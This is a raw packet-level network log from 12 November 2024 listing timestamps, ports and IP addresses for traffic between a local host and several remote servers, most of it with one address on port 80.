Nov 12, 2024 00:06:26.346204996 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346208096 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346219063 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346229076 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346240997 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346240997 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346250057 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346252918 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346265078 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346273899 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346292019 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346298933 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346317053 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346318960 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346328974 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346340895 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346343994 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346352100 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346354008 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346365929 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346376896 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346384048 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346385956 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346398115 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346406937 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346410036 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346425056 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346436024 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346437931 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346450090 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346461058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346463919 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346472025 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346473932 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346488953 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346498966 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346499920 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346513033 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346528053 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346528053 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346539021 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346544981 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346551895 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346561909 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346566916 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346574068 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346576929 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346586943 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346596956 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346601963 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346611023 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346632957 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346777916 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346790075 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346801043 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346818924 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346827030 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346930027 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346946001 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346957922 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346965075 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346968889 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346982002 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346983910 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346992016 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346998930 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347009897 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347013950 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347021103 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347032070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347042084 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347048044 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347048044 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347059011 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347059965 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347073078 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347079992 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347091913 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347105026 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347107887 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347115993 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347130060 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347138882 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347150087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347151041 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347162008 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347172976 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347181082 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347183943 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347196102 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347198963 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347208023 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347218990 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347223997 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347243071 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347251892 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347260952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347264051 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347273111 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347289085 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347290993 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347299099 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347302914 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347316980 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347326994 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347330093 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347345114 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347346067 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347362041 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347371101 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347373962 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347378969 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347388983 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347399950 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347403049 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347409964 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347414017 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347433090 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347450018 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347456932 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347526073 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347537994 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347556114 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347565889 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347567081 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347579002 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347594023 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347600937 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347630024 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.347745895 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347771883 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.347810984 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.348684072 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348702908 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348715067 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348742962 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.348768950 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.348838091 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348861933 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348874092 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348884106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348896980 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348898888 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.348910093 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348928928 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.348934889 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348944902 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.348953009 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348965883 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348977089 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348988056 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.348998070 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349004984 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349016905 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349019051 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349026918 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349029064 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349042892 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349054098 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349061012 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349066019 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349076033 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349086046 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349091053 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349104881 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349112034 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349116087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349128008 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349128008 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349139929 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349152088 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349157095 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349164009 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349175930 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349185944 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349186897 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349198103 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349200010 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349205017 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349217892 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349240065 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349247932 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349257946 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349268913 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349280119 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349281073 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349291086 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349302053 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349306107 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349319935 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349328041 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349332094 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349343061 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349347115 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349361897 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349370003 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349371910 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349385023 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349391937 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349395037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349409103 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349411964 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349425077 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349436045 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349437952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349450111 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349462032 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349466085 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349473953 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349487066 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349488974 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.349495888 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.349529982 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.465075970 CET	443	49824	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.465615988 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.465859890 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.470539093 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470552921 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470565081 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470599890 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.470648050 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.470680952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470695019 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470731974 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.470803976 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470817089 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470829010 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470840931 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470844030 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.470854044 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470865011 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470870972 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.470877886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470890045 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470895052 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.470902920 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470910072 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.470916033 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470926046 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.470935106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470947981 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470956087 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.470959902 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470972061 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470983028 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.470984936 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470998049 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.470998049 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471009970 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471023083 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471023083 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471035004 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471045971 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471049070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471066952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471076012 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471086025 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471095085 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471098900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471111059 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471122026 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471122026 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471132994 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471146107 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471151114 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471158028 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471169949 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471172094 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471182108 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471199989 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471200943 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471220016 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471220016 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471235037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471235991 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471249104 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471261024 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471261024 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471276045 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471277952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471291065 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471302032 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471302986 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471321106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471328020 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471334934 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471347094 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471348047 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471358061 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471370935 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471375942 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.471395969 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.471419096 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.477847099 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.477967978 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.478199959 CET	49823	443	192.168.2.5	23.219.161.135
Nov 12, 2024 00:06:26.478435040 CET	443	49823	23.219.161.135	192.168.2.5
Nov 12, 2024 00:06:26.482434988 CET	49823	443	192.168.2.5	23.219.161.135
Nov 12, 2024 00:06:26.482466936 CET	443	49823	23.219.161.135	192.168.2.5
Nov 12, 2024 00:06:26.484411955 CET	443	49825	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.489068031 CET	49824	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.489090919 CET	443	49824	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.489434004 CET	49825	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.489444971 CET	443	49825	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.489799976 CET	49824	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.489808083 CET	443	49824	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.489840984 CET	49825	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.489845037 CET	443	49825	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.495341063 CET	443	49819	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.495345116 CET	443	49817	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.495419979 CET	49819	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.495517969 CET	49817	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.496623993 CET	443	49828	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.497920990 CET	49828	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.497937918 CET	443	49828	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.498153925 CET	443	49826	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.498473883 CET	49828	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.498481989 CET	443	49828	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.499327898 CET	443	49820	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.499385118 CET	49820	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.499634027 CET	49826	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.499655008 CET	443	49826	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.499831915 CET	443	49827	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.500121117 CET	49826	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.500128984 CET	443	49826	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.501317978 CET	49827	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.501324892 CET	443	49827	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.502041101 CET	49827	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.502046108 CET	443	49827	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.522067070 CET	49818	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.535711050 CET	443	49830	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.535887003 CET	443	49829	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.538100004 CET	49830	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.538119078 CET	443	49830	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.538543940 CET	443	49830	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.538889885 CET	49829	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.538901091 CET	443	49829	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.539236069 CET	443	49829	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.540827036 CET	49830	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.540911913 CET	443	49830	172.64.41.3	192.168.2.5
